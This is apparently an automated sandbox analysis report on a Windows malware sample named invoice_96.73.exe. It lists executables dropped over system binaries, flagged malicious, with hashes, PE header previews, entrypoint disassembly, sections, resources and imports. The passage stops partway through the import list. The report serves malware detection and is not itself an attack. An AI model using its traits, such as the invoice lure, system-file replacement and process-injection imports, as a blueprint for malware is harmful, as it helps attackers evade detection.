                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1625600
                                                                                                                                                                Entropy (8bit):4.2224518673321185
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:y81ONGM1cV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:H41gVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:2568F4F643C82673898904F584A264BA
                                                                                                                                                                SHA1:79519E3BAA9B9073A1819D8ECF33C623681DCCD7
                                                                                                                                                                SHA-256:2D21E0A47C95FA5A2F8B0D882F6D6AF25A4103BD421631D78CC6A3C1166477B0
                                                                                                                                                                SHA-512:82352C84D08C4F7B3302ADFBB10F90DDC5C64800D0AA8BF2FCC815D9BD9F7BA6AE957EFA89981D7E5962AB2F6DA6DBDBCDE0821B89B275CDE701F08478725D88
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.B.:.,.:.,.:.,.3...8.,.3...*.,.3...5.,.:.-...,.3...{.,.3...8.,...R.;.,.3...;.,.3...;.,.Rich:.,.........PE..d....H#X..........".................8t....................................... ....................... ......................................X........... ...............................................................................P............................text............................... ..`.data....G.......2..................@....pdata..............................@..@.rsrc... ........ ..................@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\snmptrap.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1512960
                                                                                                                                                                Entropy (8bit):4.011174800223528
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:SPV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S9Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:2A428B8B0253AA1D839ED564BA512230
                                                                                                                                                                SHA1:F609022F2A47AF21EFC6FA08AA9798CA6FBB5D7C
                                                                                                                                                                SHA-256:9F95CC146CC7FBE17FD95FF7D61AA7F319EE12624FD54B3976D17FC5D2AD9DF1
                                                                                                                                                                SHA-512:14600D65A165E02438413CFD04E66C4D85207ADF93E2C7D1DC3B35E439AC5F4D37ADD5844E97B910AADBCFF23EAAF7DABAFC66EAAEAF4C67D7DFEF59B4A5BC1A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................q.......`.......f...............v.......|.......a.......d.....Rich....................PE..d.....[J.........."......&...........&.......................................`.......0............... ......................................$...d....`.......P..................................................................t.......`............................text....%.......&.................. ..`.data........@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc.......p.......6..............@...k.[J8.....[JE...+.[JR.....[J\...+.[JR.....[Jg...........ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.WS2_32.dll...............................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\sppsvc.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4106240
                                                                                                                                                                Entropy (8bit):7.320766799638362
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:aadpFZx1nkQoqvUbvgXELEnAR0gXV/XB+7nZE1GhnuFnNeNMWo8CWgiV5omI05IX:RFZxeecao3yudFnN0DHIesUf
                                                                                                                                                                MD5:1BFA3EDF35211FF6EEDA3F3D010CF0F6
                                                                                                                                                                SHA1:1B034FD9E4E2D2DD100C43714BD0B403FDE7BC55
                                                                                                                                                                SHA-256:FAF7A8737727328CAF5860FE6EC5D5BB85C1AA23B9E5391C24DD1D7AF45AB572
                                                                                                                                                                SHA-512:A58422471991C9627107643716C82E58A0467606CE21B4DCB0C9F52D689ADDA1797B7647AB3B91F8D3B7BE7EEB4AB41166C534C6F810DA18C1CECD5ECB85B47B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%^..a?u^a?u^a?u^F..^c?u^hG.^e?u^hG.^.?u^hG.^n?u^a?t^&>u^hG.^6?u^hG.^T?u^F..^`?u^hG.^`?u^hG.^`?u^hG.^`?u^Richa?u^........................PE..d...d..L..........".......1.....................................CS P..........>.......?...............................................0.l....0.......5..%....4.<...................<.0.8...............................................0............................text...x.1.......1................. ..`.data....x...01..z..."1.............@....pdata..<.....4.......4.............@..@.rsrc....%....5..&....5.............@..@.reloc........5.......5.............@...U..LP......L]......Lg......L]...7..Lt......L]...n..L.......L]...,..L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.msvcrt.dll.RPCRT4.dll.ole32.dll.............................................................................................................................

                                                                                                                                                                C:\Windows\System32\vds.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2029568
                                                                                                                                                                Entropy (8bit):4.790645850085516
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:LvMgzNciyYe13kvoUGVg9N9JMlDlfjRiVuVsWt5MJMs:bcibeUoUCgFIDRRAubt5M
                                                                                                                                                                MD5:CC2DA4A13C382DA8674052AB5005C252
                                                                                                                                                                SHA1:2F75BD4F4FE4CF5BA3A0C23D76C396A25EC87D76
                                                                                                                                                                SHA-256:4993E48087833157D2C34E79357415B7BBEB955AE832EE3E3A5BD9EBD56026C4
                                                                                                                                                                SHA-512:B65E1CE94E1F9A83A5554CC95CC30220B3785B84EFBA004D4C88DA27D170901A16B6EB760F1C72541C366B5D7D059C6D7DD77AB8ADEB40EABC9C54F415517234
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................................Rich...........................PE..d... ..L.........."..........P......lT.......................................@.......,............... ...................................#.....D....@..........."..................P...........................................d...................................text............................... ..`.data...x...........................@....pdata...".......$..................@..@.rsrc........@......................@..@.reloc.......P......................@......L ......L+...7..L5......L+...h..L@......L+......LH......Li......L.......L.......L.......L+......L.......L.......L;......Ld......L.......L.......L.......L.......L+......L.......L!......L+......LB......Le......L.......L.......L.......L.......L#...\..L0...5..L=......LJ......LV...........

                                                                                                                                                                C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1696768
                                                                                                                                                                Entropy (8bit):4.315210133032662
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:R/UpJVupkVg9N9JMlDlfjRiVuVsWt5MJMs:RU0pkgFIDRRAubt5M
                                                                                                                                                                MD5:BB516AD00A572BD36D65033D5A6DA5D2
                                                                                                                                                                SHA1:C6A37EB9185F8E9C0DE17817DA0655ECDD1A137A
                                                                                                                                                                SHA-256:B0D1CFC84983DEBFE0AD52063DA1DA61497815C43A416406D75163E95BA005FA
                                                                                                                                                                SHA-512:0A03686CFED7BE7C13C9EB464B1B6B50CA6DD74B830E4F04341E71931422A5E470743DA2B93A1D6D5507461BE3703A480781F313DF9358ACC9E0E959F1427765
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...~...~...~...~...~......~......~......~......~...~...~......~......~.o~...~......~Rich...~........PE..d....-JX.........."..........N......0..........@............................. ............ .......... .................................@%..0........ .. ...............................8...........................P............... ................................text...Z........................... ..`.rdata..............................@..@.data...............................@....pdata........... ..................@..@.rsrc... .... ......................@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\wbengine.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2083328
                                                                                                                                                                Entropy (8bit):7.086602580064013
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:7LbYI4I0bVKBUhx8CRSrzQ8vbeKgSRpXxmDYeQeaUx7qEaYZgFIDRRAubt5M:TYZkBU6ZvCK/phm8eQN82Uf
                                                                                                                                                                MD5:B9B616B65A90E396A161A24A8A456884
                                                                                                                                                                SHA1:BD17E97CFACEB35FACA77FC63D9502D1968FEE0E
                                                                                                                                                                SHA-256:B20F84651BEC2A01953D66A43A555500E363B892EF71FB635FB7D66FA0100145
                                                                                                                                                                SHA-512:D608E1DAA5AC077496B0546B9711779BAF8137C1EB7E210BDB47720C6F3E9DAB2BA9CFF2787837AC0F051BF1E4DFCF1681D9B252F57CB2B5C6056EB1768CCF15
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u.4.~...u.%.w...u.2.c...|...~..u.".e...u.+.....u.3.}...u.5.}...u.0.}...Rich|...........................PE..d...Q..L.........."......8..........H........................................ ......t .............. ...............................B......X...@...............................................................................t....................................text....6.......8.................. ..`.data....-...P.......>..............@....pdata...............L..............@..@.rsrc...............................@..@.reloc....... ......................@...U..L.......L.......L.......L.......L....7..L.......L.......L....,..L....0..L....n..L.......L.......L.......L.......L)......L4...1..LA......LM......LX...q..Le...........ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.RPCRT4.dll.VSSAPI.DLL.SETUPAPI.dll.NETA

                                                                                                                                                                C:\Windows\ehome\ehrecvr.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1276416
                                                                                                                                                                Entropy (8bit):6.993606629682265
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:rGne3OZEIOLMCldIgbZVg9N9JMlDlfjRiVuVsWt5MJMs:xeZizdIgbjgFIDRRAubt5M
                                                                                                                                                                MD5:22DA4B53195377BBE2A2460989C3D203
                                                                                                                                                                SHA1:E20761786A4FB40EF1D483EB7964F8A6C080E0C7
                                                                                                                                                                SHA-256:18A0332DA30D012BC06D16A5373EA9A2625D0095999181B1D8070181922FF7D6
                                                                                                                                                                SHA-512:A6B806C3B9FAA3D6DB0B68D1A983498DDBFDB3AF1E3E99FABAD12965D62B05B4F0CB7FCE87A8DD37CBDC8DBAF142ED71E60836A9D2703811C8CC0DA0EB499C2C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X..9...9...9...A8..9...A)..9...A>..9...9...8...A...9...A'..9...A?..9...A9..9...A<..9..Rich.9..........PE..d......L..........".................4G.........@....................................A<............... ..............................dm......do..........`....`...K...................'..8............................................0..p............................text...h........................... ..`.rdata.......0......................@..@.data...l....@.......(..............@....pdata...K...`...L...:..............@..@.rsrc...`...........................@..@.reloc..............................@...U..Lx......L.......L.......L....7..L.......L....,..L....0..L.......L.......L.......L.......L.......L....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.SHLWAPI.dll.VERSION.dll.ehTrace.dll.SHELL32.dll.slc.dll........

                                                                                                                                                                C:\Windows\ehome\ehsched.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1625600
                                                                                                                                                                Entropy (8bit):4.203355634797232
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:wwXAwhzV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:rQwh5Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:C0B1AC1980E0EE5E641EA4C250791D87
                                                                                                                                                                SHA1:92BAF4E87A29EC1CA026E1F81F2E9D07A923DA6A
                                                                                                                                                                SHA-256:BD9641A049AD1A823DA8713A34D0D4310163B6F42ACDEC233040465008ED96C9
                                                                                                                                                                SHA-512:6ED1955FA30634C048C6A3D6875BF5B3B2D572828FDD9960B5E59F8D237A9BA5E7643DA65A83F6BF43BF8BC9A821E7ED334964E1F332A3F0249A8D596C36D318
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... Z..N...N...N.......N.......N.......N...O.u.N.......N.......N.......N.......N.Rich..N.........................PE..d...5.[J..........".................L?.........@............................. ......|................ .................................................p............................+..8............................................0...............................text...l........................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...p...........................@..@.reloc.......0......................@...k.[JP.....[J]...+.[Jj.....[Jt.....[J....+.[Jj.....[J......[J....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.slc.dll........................................................................................

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.4930840408824
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:invoice_96.73.exe
                                                                                                                                                                File size:1'799'680 bytes
                                                                                                                                                                MD5:0ad46265c37a53172d0658e862699a0e
                                                                                                                                                                SHA1:82a738aeecee1392fcbb46a6ebceb367790e4831
                                                                                                                                                                SHA256:04bd713b045d145c032e88c3f122e92565b3647e016367e29987c9afc2666d04
                                                                                                                                                                SHA512:5e8e026dbd9a1c2f2c056010722e22a4be154eb46e5e5625117543a08d2fa4c4472c3b1c9e2807cc19cabc21993d745a76f6dab900e63ba970b5b9bf3bdf1d2d
                                                                                                                                                                SSDEEP:24576:7tb20pOaCqT5TBWgNQ7akrR8kGeN5QRY+Dbjkf256AkVg9N9JMlDlfjRiVuVsWtK:4vg5tQ7akrekGqEvd5kgFIDRRAubt5M
                                                                                                                                                                TLSH:D985F11373DE83A1C3B25273BA267741AE7F782506A1F56B2FD4093DEC60122525EB63
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:aaf3e3e3938382a0

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x425f74
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x67470F67 [Wed Nov 27 12:24:07 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:5
                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                File Version Major:5
                                                                                                                                                                File Version Minor:1
                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                call 00007FA32CD5718Fh
                                                                                                                                                                jmp 00007FA32CD4A1A4h
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                push edi
                                                                                                                                                                push esi
                                                                                                                                                                mov esi, dword ptr [esp+10h]
                                                                                                                                                                mov ecx, dword ptr [esp+14h]
                                                                                                                                                                mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                add eax, esi
                                                                                                                                                                cmp edi, esi
                                                                                                                                                                jbe 00007FA32CD4A32Ah
                                                                                                                                                                cmp edi, eax
                                                                                                                                                                jc 00007FA32CD4A68Eh
                                                                                                                                                                bt dword ptr [004C0158h], 01h
                                                                                                                                                                jnc 00007FA32CD4A329h
                                                                                                                                                                rep movsb
                                                                                                                                                                jmp 00007FA32CD4A63Ch
                                                                                                                                                                cmp ecx, 00000080h
                                                                                                                                                                jc 00007FA32CD4A4F4h
                                                                                                                                                                mov eax, edi
                                                                                                                                                                xor eax, esi
                                                                                                                                                                test eax, 0000000Fh
                                                                                                                                                                jne 00007FA32CD4A330h
                                                                                                                                                                bt dword ptr [004BA370h], 01h
                                                                                                                                                                jc 00007FA32CD4A800h
                                                                                                                                                                bt dword ptr [004C0158h], 00000000h
                                                                                                                                                                jnc 00007FA32CD4A4CDh
                                                                                                                                                                test edi, 00000003h
                                                                                                                                                                jne 00007FA32CD4A4DEh
                                                                                                                                                                test esi, 00000003h
                                                                                                                                                                jne 00007FA32CD4A4BDh
                                                                                                                                                                bt edi, 02h
                                                                                                                                                                jnc 00007FA32CD4A32Fh
                                                                                                                                                                mov eax, dword ptr [esi]
                                                                                                                                                                sub ecx, 04h
                                                                                                                                                                lea esi, dword ptr [esi+04h]
                                                                                                                                                                mov dword ptr [edi], eax
                                                                                                                                                                lea edi, dword ptr [edi+04h]
                                                                                                                                                                bt edi, 03h
                                                                                                                                                                jnc 00007FA32CD4A333h
                                                                                                                                                                movq xmm1, qword ptr [esi]
                                                                                                                                                                sub ecx, 08h
                                                                                                                                                                lea esi, dword ptr [esi+08h]
                                                                                                                                                                movq qword ptr [edi], xmm1
                                                                                                                                                                lea edi, dword ptr [edi+08h]
                                                                                                                                                                test esi, 00000007h
                                                                                                                                                                je 00007FA32CD4A385h
                                                                                                                                                                bt esi, 03h
                                                                                                                                                                jnc 00007FA32CD4A3D8h
                                                                                                                                                                movdqa xmm1, dqword ptr [esi+00h]

                                                                                                                                                                Rich Headers

                                                                                                                                                                Programming Language:
                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                                • [RES] VS2012 UPD4 build 61030
                                                                                                                                                                • [LNK] VS2012 UPD4 build 61030

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x60be0.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x8b54f0x8b600b92b1482df7de0712da080eaf44fb490False0.5699516535874439data6.680433526828655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rsrc0xc40000x60be00x60c00a9c5e6f80a5245cdcf308d90e1a5a77dFalse0.9326651324289406data7.90341452865778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x1250000x990000x98000e198d289e42fb32f681b32c20a88ce36False0.9548998380962171data7.876658513199357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                RT_RCDATA0xcc7b80x57ee7data1.0003220728162214
                                                                                                                                                                RT_GROUP_ICON0x1246a00x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                RT_GROUP_ICON0x1247180x14dataEnglishGreat Britain1.25
                                                                                                                                                                RT_GROUP_ICON0x12472c0x14dataEnglishGreat Britain1.15
                                                                                                                                                                RT_GROUP_ICON0x1247400x14dataEnglishGreat Britain1.25
                                                                                                                                                                RT_VERSION0x1247540xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                RT_MANIFEST0x1248300x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                UxTheme.dllIsThemeActive
                                                                                                                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, 